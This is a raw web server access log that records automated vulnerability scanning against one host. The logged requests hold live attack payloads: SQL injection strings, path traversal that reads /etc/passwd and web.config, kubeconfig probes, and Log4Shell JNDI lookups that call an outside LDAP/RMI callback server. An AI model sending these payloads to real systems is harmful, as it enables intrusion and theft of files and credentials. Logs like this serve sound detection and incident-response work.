120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+41166*40253,1--+&site=admin HTTP/1.1" 404 138 "http://106.12.86.167:443/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+41166*40253,1--+&site=admin" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /force-download.php?file=force-download.php HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /api/v1/clusters/kubeconfig/nexsoft HTTP/1.1" 404 138 "http://106.12.86.167:443/api/v1/clusters/kubeconfig/nexsoft" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /E-mobile/flow/forwardsucess.php?runid=1+AND+9926%3DBENCHMARK%280000000%2CMD5%280x6d63524%29%29&flowid=&flowprcs=&prcsid=&module=&scope=&page=&fromid=&detailid=&mobilesessionkey=&sessionkey=&diff=&contents=1&touserid=WV00000304 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /FeeCodes/ACCIDAdapter.aspx?mask=0&pos=0&handle=accid&accid=1%27%20and%20sys.fn_sqlvarbasetostr(HashBytes('MD5','yzconiww'))=1-- HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,md5(58427)),1)%23 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /WEB_SERVICE/Budget.asmx/getFixedBaseInfo_page?where=1=user&intPageIndex=1&pageSize=10 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /force-download.php?file=force-download.php HTTP/1.1" 404 138 "http://106.12.86.167:443/force-download.php?file=force-download.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /portal/login_init.action HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /doc/api.html HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,md5(58427)),1)%23 HTTP/1.1" 404 138 "http://106.12.86.167:443/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,md5(58427)),1)%23" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /WebReport/ReportServer?op=plugin_logdb&cmd=test&driver=com.mysql.jdbc.Driver&url=jdbc:mysql:///finelog_bbpt?useUnicode=true&characterEncoding=UTF-8&username=public&password=123 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1" 404 138 "http://106.12.86.167:443/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /service/~uap/nc.bs.sm.login.LoginServlet HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /portal/login_init.action HTTP/1.1" 404 138 "http://106.12.86.167:443/portal/login_init.action" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /CDGServer3/workflowE/useractivate/update.jsp?flag=-1&ids=1,3);WAITFOR%20DELAY%20%270:0:0%27-- HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /api/v1/clusters/kubeconfig/stable-cluster HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST /OA/common/mod/ajax.ashx HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /doc/api.html HTTP/1.1" 404 138 "http://106.12.86.167:443/doc/api.html" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /weaver/weaver.formmode.servelt.BrowserAction?action=resetBrowserHref&href=http://127.0.0.1/?formId=%27+or+%28SELECT+SLEEP%280%29%29%23%27&modeid= HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /wp/wp-content/force-download.php?file=force-download.php HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /api/v1/clusters/kubeconfig/stable-cluster HTTP/1.1" 404 138 "http://106.12.86.167:443/api/v1/clusters/kubeconfig/stable-cluster" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /weaver/weaver.email.FileDownloadLocation/login/LoginSSOxjsp/xwhevmmd.FileDownloadLocation?ddcode=7ea7ef3c41d67297&downfiletype=eml&download=1&mailId=1123+union+select+*+from+(select+1+as+resourceid,%27../ecology/WEB-INF/web.xml%27+as+x2,%273%27+as+x3,4+as+x4,5+as+x5,6+as+x6)x+where+1=1&mailid=action.WorkflowFnaEffectNew&parentid=0 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /service/~uap/nc.bs.sm.login.LoginServlet HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST /OA/Affiche.aspx HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /wp/wp-content/force-download.php?file=force-download.php HTTP/1.1" 404 138 "http://106.12.86.167:443/wp/wp-content/force-download.php?file=force-download.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /custom-report-example/..%5C%5C..%5C%5C..%5C%5Cdeployment%5C%5Csharp%5C%5Cicons%5C%5Chome-app.png HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /LKT/index.php?module=api&action=product&m=t_comment HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /weaver/weaver.formmode.servelt.BrowserAction?action=resetBrowserHref&href=http://127.0.0.1/?formId=%27;waitfor+delay+'0%3a0%3a0'--&modeid= HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1" 404 138 "http://106.12.86.167:443/log/view?filename=/etc/passwd&base=../../../../../../../../../../" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /application.wadl HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /api/v1/clusters/kubeconfig/dev-way-simu HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /login.action HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-content/themes/ucin/includes/force-download.php?file=force-download.php HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST http://106.12.86.167:443/cooperate/videotexMonitor.js%70 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../etc/passwd&NewWebClient=1 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /api/v1/clusters/kubeconfig/dev-way-simu HTTP/1.1" 404 138 "http://106.12.86.167:443/api/v1/clusters/kubeconfig/dev-way-simu" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /?g=sys_export_conf_local_save&file_name=../../../../secgate/webui/modules/system/import_export.mds HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /app/uploadFile HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /files/ldap.debug.txt HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /v1/task HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-content/themes/ucin/includes/force-download.php?file=force-download.php HTTP/1.1" 404 138 "http://106.12.86.167:443/wp-content/themes/ucin/includes/force-download.php?file=force-download.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /?g=sys_export_conf_local_save&file_name=../../../../secgate/webui/modules/system/import_export.mds HTTP/1.1" 302 5 "http://106.12.86.167:443/?g=sys_export_conf_local_save&file_name=../../../../secgate/webui/modules/system/import_export.mds" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /files/ldap.debug.txt HTTP/1.1" 404 138 "http://106.12.86.167:443/files/ldap.debug.txt" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1" 404 138 "http://106.12.86.167:443/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST http://106.12.86.167:443/cooperate/videotexMonitor.js%70 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /api/v1/clusters/kubeconfig/shanghai-cluster HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /servlet/~ic/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /.;/admin/auth/member/1/tabShow HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/?g=sys_export_conf_local_save&file_name=../../../../secgate/webui/modules/system/import_export.mds" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "//.ivde.com" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /v1/query HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "POST / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "POST / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-content/uploads/patientforms/force-download.php?file=force-download.php HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /__$%7Bnew%20javax.naming.InitialContext%28%29.lookup%28new%20String%28new%20char%5B%5D%7B108,100,97,112,58,47,47,49,50,48,46,52,56,46,55,54,46,49,48,48,58,56,49,56,49,47,105,47,76,68,65,80,45,83,84,65,82,84,47,56,54,48,49,48,57,47,54,119,109,114,47,122,110,115,56,47,76,68,65,80,45,69,78,68%7D%29%29%7D__::.x HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "new javax.naming.InitialContext().lookup(\x22ldap://120.48.76.100:8181/i/LDAP-START/2df772/ezez/trr9/LDAP-END\x22)" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "${url:bCOlrvSm:http://120.48.76.100:8181/i/0a3fbe/1hcs/3ebn/}" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /api/v1/clusters/kubeconfig/shanghai-cluster HTTP/1.1" 404 138 "http://106.12.86.167:443/api/v1/clusters/kubeconfig/shanghai-cluster" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "${jndi:rmi://120.48.76.100:8182/i/hcSvqI7U/3cd0f8/sc8v/i3yu/PQ5P8iBh/}" "${jndi:rmi://120.48.76.100:8182/i/hcSvqI7U/b52990/sc8v/ihxz/PQ5P8iBh/}"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /API/user/list HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "POST / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-includes/css/dashicons.min.css.map?ver=6.7.2 HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST /WXAPI.asmx/GetSalQuatation HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /__$%7Bnew%20javax.naming.InitialContext%28%29.lookup%28new%20String%28new%20char%5B%5D%7B108,100,97,112,58,47,47,49,50,48,46,52,56,46,55,54,46,49,48,48,58,56,49,56,49,47,105,47,76,68,65,80,45,83,84,65,82,84,47,56,52,52,48,98,51,47,54,119,109,114,47,114,50,99,105,47,76,68,65,80,45,69,78,68%7D%29%29%7D__::.x HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-content/uploads/patientforms/force-download.php?file=force-download.php HTTP/1.1" 404 138 "http://106.12.86.167:443/wp-content/uploads/patientforms/force-download.php?file=force-download.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /servlet/~ic/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /DownloadWindow.php?filename=/../../../../../../../../../etc/passwd HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "new javax.naming.InitialContext().lookup(\x22ldap://120.48.76.100:8181/i/LDAP-START/2df772/ezez/trr9/LDAP-END\x22)" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /proxy.cgi?chk&url=http://120.48.76.100:8181/i/89f3f2/dvbm/9irh/ HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "${url:bCOlrvSm:http://120.48.76.100:8181/i/0a3fbe/1hcs/3ebn/}" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST /defaultroot/upload/fileUpload.controller HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /ui/ HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
